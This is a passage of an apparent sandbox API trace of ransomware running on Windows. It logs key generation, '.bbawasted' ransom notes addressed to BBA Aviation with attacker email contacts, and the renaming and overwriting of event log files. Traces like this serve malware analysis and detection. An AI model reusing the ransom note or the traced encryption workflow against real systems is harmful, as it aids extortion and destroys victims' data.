CloseHandle (hObject=0x294) returned 1 [0185.117] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0185.118] CloseHandle (hObject=0x280) returned 1 [0185.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0185.118] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0185.118] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0185.119] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0185.119] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6a38) returned 1 [0185.119] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0185.119] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0185.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0185.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0185.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.128] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ER74Bpb/nQSGoxKTElR8eQXj1tATZ+EujB+fY1GYWJ1tTrx+r1gj6E8c+nKmwPnj\r\nTDnqi7MlhrgmXr9MKDPKw3b5PPwTQshX4GZ3dmR4FIOUaY3+yeX8uyJQkndhg0P5\r\nyM4B015Efhy9/mFhnIhlcipb9/P3Eva72yv9cQy8K4HGF2K4LaJRIl+EH/gvrcTo\r\niOPRdfivpfic9/YPC2pDjFl7aiXcGeym1W5D1tc+P3FXgYxAy2kIszr8kzeOi/nf\r\nV9OiiPvQEDEASVtz6T0ot4NHE6xjFXKyE3mw4+gijedOn6q2t0/ujsGGwqNDAVYu\r\noGIsrq5MOrRdWU2OSpV3294wRmYCOE7xHVwMBU26ri4OHXTq4lKDF7lRr50ED5QN\r\nksbfLCAHA4jg4PszhEdQdfH4qySWHW+HIu1SzDPsh+vX40+uVKfqslGZ9O88OkMQ\r\noN3WCT4dWZYeunXG5ex6pArChyYJc0SEEe9+Ytyd9FdyNluVuzX+nE4rFf/YKJf6\r\nEVVPSE//Eagd1WdBb8Dq0XL/wt7vAJYgQzL+R4/f9hNtNoITAKR2dNLZzhJCoyoV\r\nuU2hLOuT8OLUvGczCXom3chvYBDqSbgV4sH2LV6atIODtw0w6id/KQ3hE2XXP5Bv\r\nwBs2dtN/k7P3x178/SeQdm2tdVCc8nDiPwD1r0AFWRY=[end_key]\r\nKEEP IT\r\n") returned 984 [0185.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0185.128] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0185.128] SetEndOfFile (hFile=0x28c) returned 1 [0185.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.130] CloseHandle (hObject=0x28c) returned 1 [0185.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0185.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69eca8 | out: hHeap=0x660000) returned 1 [0185.136] _aulldvrm () returned 0x0 [0185.136] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0185.137] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0185.137] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0185.137] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 59 [0185.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0185.137] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0185.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.137] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0185.138] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0185.138] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0185.138] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0185.208] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0185.226] SetEndOfFile (hFile=0x28c) returned 1 [0185.226] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.226] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.226] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0185.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.bbawasted")) returned 1 [0185.228] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0185.228] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0185.228] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0185.228] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0185.229] CloseHandle (hObject=0x280) returned 1 [0185.241] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0185.242] CloseHandle (hObject=0x294) returned 1 [0185.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0185.242] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0185.242] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0185.243] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0185.243] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0185.243] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0185.243] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0185.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0185.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0185.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.253] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]aQDFInJT02eRolUg9ABtyHrEie2ILIrHWuLXx4ohlcfv/Xzk+xI2ibzsANOzPMIS\r\nsfYMxT9qRNp5tG0gg0t7F3zTYmb+NLP+zzYlmihGwa7JfhkcWD9i3iJClXUudGGi\r\nUL2skbfo00n/pviuJ6pVMDRoJPy+vogcYK+NdGpHAE4pQu5r/V6PbXdroYWfFFuO\r\n0RxaQQifmK1TjL26JJUdAqXJnun0kJ630RL4PbZZH0CGFcITAOyPSxSdR3TyVKMh\r\nMRktLk2+C0A9grfhEvGTqaaaL23C2FBI3ClKv5b4eXcgj0M+SMkRKAzkUvkoNPYu\r\n/CdBABhkNpxFU15vIbozIy0dxRMVqP+DOWH70czKzJuOJLvuzmBS/BHm6QVpbZgk\r\n/dQVqbknssZdez62NpKT24qxq8gelCEGD+s7I4xo2pPBO24UNGPdfjHP1RFDRc2A\r\nu4i8BR4NHrzqku8JZzu5jL9QeZt5I+hIYsIp1KV6tIWMwIHTCgTMvnVLsRjwvuzt\r\n9suKrAXN9GIOMFnyhx4WFyUcV/Pk2TYrJUR3bn+Tur8kGPvwfDaI2phGBiwiizxE\r\n2ujukxAeKJbb0cXHcT5XTBPj1Rhq5QRytKFJ9pSOz5xV+tcbXLzGRI7UyfOaicfi\r\nKhCqXmKHjlYi0y1g7b1i90r3mceXfBvf0KRRRrWCz5y=[end_key]\r\nKEEP IT\r\n") returned 984 [0185.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0185.253] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0185.253] SetEndOfFile (hFile=0x28c) returned 1 [0185.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.256] CloseHandle (hObject=0x28c) returned 1 [0185.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0185.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69eda0 | out: hHeap=0x660000) returned 1 [0185.260] _aulldvrm () returned 0x0 [0185.260] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0185.261] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0185.261] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0185.261] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 61 [0185.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6aecf0 [0185.375] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0185.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.375] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0185.376] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0185.376] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0185.376] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0185.376] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0185.378] SetEndOfFile (hFile=0x28c) returned 1 [0185.379] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.379] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0185.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.bbawasted")) returned 1 [0185.380] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0185.380] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0185.380] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0185.381] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0185.381] CloseHandle (hObject=0x294) returned 1 [0185.394] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0185.394] CloseHandle (hObject=0x280) returned 1 [0185.394] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0185.394] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0185.395] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0185.395] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0185.395] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a69b0) returned 1 [0185.396] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0185.396] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0185.408] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0185.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0185.408] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.408] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]i/H28gU4AbBlG1LcIRQdxBruVvkae/FtwpfqXvr5Wbc5PW4iI2j9hOCPNX63Eb1s\r\niH71Xc1q50Pm/tDGcRP54GyK4eaN6nVmmz1MaTzULh0zozdQKQDjbWj1j9eibLh2\r\n3xDJ6FV9SgXSdOAGAvFBvsaGBs46G3S6d2/Vp4WH/CVHDu5zB8lpoWRh+QJqhrod\r\nUFCW0CHKpZD4y+YX1MH/JH1tx0DqFD2kAVUaVvWRWDMpG2PbI1fRSb5bCvjqjjbv\r\n/NTR5LV9ssmt3CS1a1OBE2ss4+joVrn55eHjjhWlgPYs+KWsLXtJpd0JvVl98Czn\r\nOrDev18tnLwHQLsC22WwDaOEA6Tdc+oeVJPrcwhkJ5v2U9OYzcNnaPAxrSFyQ4dv\r\n9UFxpukXKOrWXg7BTE0VKr/zTkTZXBUhNPTtp5In1W0+R9ZSOA/+BsPbftOsrWEH\r\nWpE+RIp5Eopyppt6UJFUJcOWq76aAMZjt3U8kjsI+j1tx7695vzseQCUgd3UpJ8Q\r\nA9keT0zwRwfXPB+v+MHI04kbtfdNSa6JkJZcolsoxnyiqnRIBEwoO3orZ/DyiPW9\r\nVbA2Pkbq3tfOwbdSBIqnKh6rY+6ftJ+17I8e733eYP+ctGjzBSQdxSSxxlhZCbmO\r\nuvn0SpFhB5/tbt7gDHOKi5jcsT2L2Ztr1dkxouBh4jh=[end_key]\r\nKEEP IT\r\n") returned 984 [0185.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0185.408] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0185.408] SetEndOfFile (hFile=0x28c) returned 1 [0185.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.411] CloseHandle (hObject=0x28c) returned 1 [0185.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0185.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a80b0 | out: hHeap=0x660000) returned 1 [0185.416] _aulldvrm () returned 0x0 [0185.416] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6ce0) returned 1 [0185.417] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0185.417] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0185.417] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 75 [0185.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a0) returned 0x6aecf0 [0185.417] lstrcpyW (in: lpString1=0x6aed86, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0185.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.602] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0185.603] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0185.603] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0185.603] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0185.605] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0185.606] SetEndOfFile (hFile=0x28c) returned 1 [0185.606] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.606] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0185.606] lstrcpyW (in: lpString1=0x6aed86, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0185.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.bbawasted")) returned 1 [0185.636] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0185.636] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0185.636] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0185.636] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0185.637] CloseHandle (hObject=0x280) returned 1 [0185.658] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0185.658] CloseHandle (hObject=0x294) returned 1 [0185.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0185.658] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a60a8) returned 1 [0185.659] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0185.659] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0185.659] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0185.660] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0185.660] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0185.815] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0185.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0185.815] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0185.815] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 